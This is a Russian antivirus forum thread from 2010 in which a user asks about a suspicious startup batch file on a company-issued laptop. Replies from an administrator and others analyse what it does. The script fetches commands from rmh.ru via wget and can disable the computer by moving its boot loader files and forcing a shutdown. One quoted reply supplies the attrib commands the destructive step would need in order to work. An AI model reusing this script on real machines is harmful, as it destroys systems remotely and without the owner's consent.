Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Центр вирусных исследований и аналитики Обнаружение вредоносного кода и ложные срабатывания

Запланированные задания (угроза)

1
RSS
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 11.07.2010 13:39:12
Здравствуйте! объясните пожалуйста смысл файла main.bat который запускается автозагрузкой и включает задачи странного названия.

Были выполнены действия:
1) c:\windows\system32\main.bat удалил файл.
2) Удалил файлы:
c:\windows\tasks\at1.job
c:\windows\tasks\at2.job
c:\windows\tasks\at3.job
c:\windows\tasks\at4.job
c:\windows\tasks\At1.job
c:\windows\tasks\At2.job
c:\windows\tasks\At3.job
c:\windows\tasks\At4.job

route print - чист

Структура bat файла:
Код
@echo off
cd c:\windows\system32
:begin
echo Searching for IP adress...
ipconfig | grep IP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noip

:ipfound
echo IP address found in ipconfig output
echo Pinging RMH.RU
ping -n 1 rmh.ru | grep.exe Ping
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noreply

:inet
echo Reply from RMH.RU retrieved
echo Empty command
echo > command.txt
echo Retrieving command from server...
wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1
echo Retrieved, checking command
type command.txt | grep STOP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto end


:STOP
type command.txt | grep STOP > nul
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto wcommand

:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end

:noip
echo IP address not found in ipconfig output
goto end

:noreply
echo No reply from RMH.RU
goto end

:wcommand
echo Wrong command retrieved. Typing command:
echo ---
type command.txt
echo ---
goto end

:error
echo Grep error
goto end

:end


Вопрос такого характера - ноутбук, предоставлен компанией "Ромир", у меня подозрения, что они какие-то сведения хотели получать, при подключении к их сайту.
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 11.07.2010 13:47:24
Подскажите о каких сведениях может идти речь?

Сайт в структуре bat файла RMH.RU
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 11.07.2010 14:12:41
Цитата
:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end
Перемещение загрузчика ОС приведет к убийству системы. Зачем, спрашивается?
[ Как создать образ автозапуска? ]
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 11.07.2010 17:34:56
Может данным методом при последующей установки ОС файл уживается в системе?
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 12.07.2010 03:01:08
Цитата
системные файлы перенести не так уж просто.
надо для начала атрибуты им поменять. без этого получается такое:

C:\>move /y c:\boot.ini c:\windows
Не удается найти указанный файл.

C:\>move /y c:\ntdetect.com c:\windows
Не удается найти указанный файл.

C:\>move /y c:\ntldr c:\windows
Не удается найти указанный файл.

C:\>attrib boot.ini
SHR C:\boot.ini

C:\>attrib ntdetect.com
A SHR C:\NTDETECT.COM

C:\>attrib ntldr
A SHR C:\ntldr

C:\>

т.е. "плохой батник" должен начинаться со строчек
attrib -shr +a boot.ini
attrib -shr ntdetect.com
attrib -shr ntldr

и то я сильно сомневаюсь, что винда "разрешит" такие изменения.
 
Виктор
Виктор
Пользователь
Сообщений: 411
Баллов: 328
Регистрация: 29.05.2010
Размещено 13.07.2010 10:07:40
Ни одного ответа от Администраторов.
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 13.07.2010 10:36:35
Цитата

grep — утилита командной строки, которая находит на вводе строки, отвечающие заданному регулярному выражению, и выводит их, если вывод не отменён специальным ключом. Название представляет собой акроним английской фразы «search globally for lines matching the regular expression, and print them» — «искать везде строки, соответствующие регулярному выражению, и выводить их».
смысл батника видимо в том, чтобы найти в настройках определенный ИП, пропинговать сайт rmh.ru, получить отткуда файл инструкций, протрассировать список команд, если найден STOP, то завершить выполнение в противном соучае управление идет на раздел die, что переводится как "угасать, умирать". Может, это просто любительский батник? с какой целью вам передан ноут от Ромира?
[ Как создать образ автозапуска? ]
 
1
Читают тему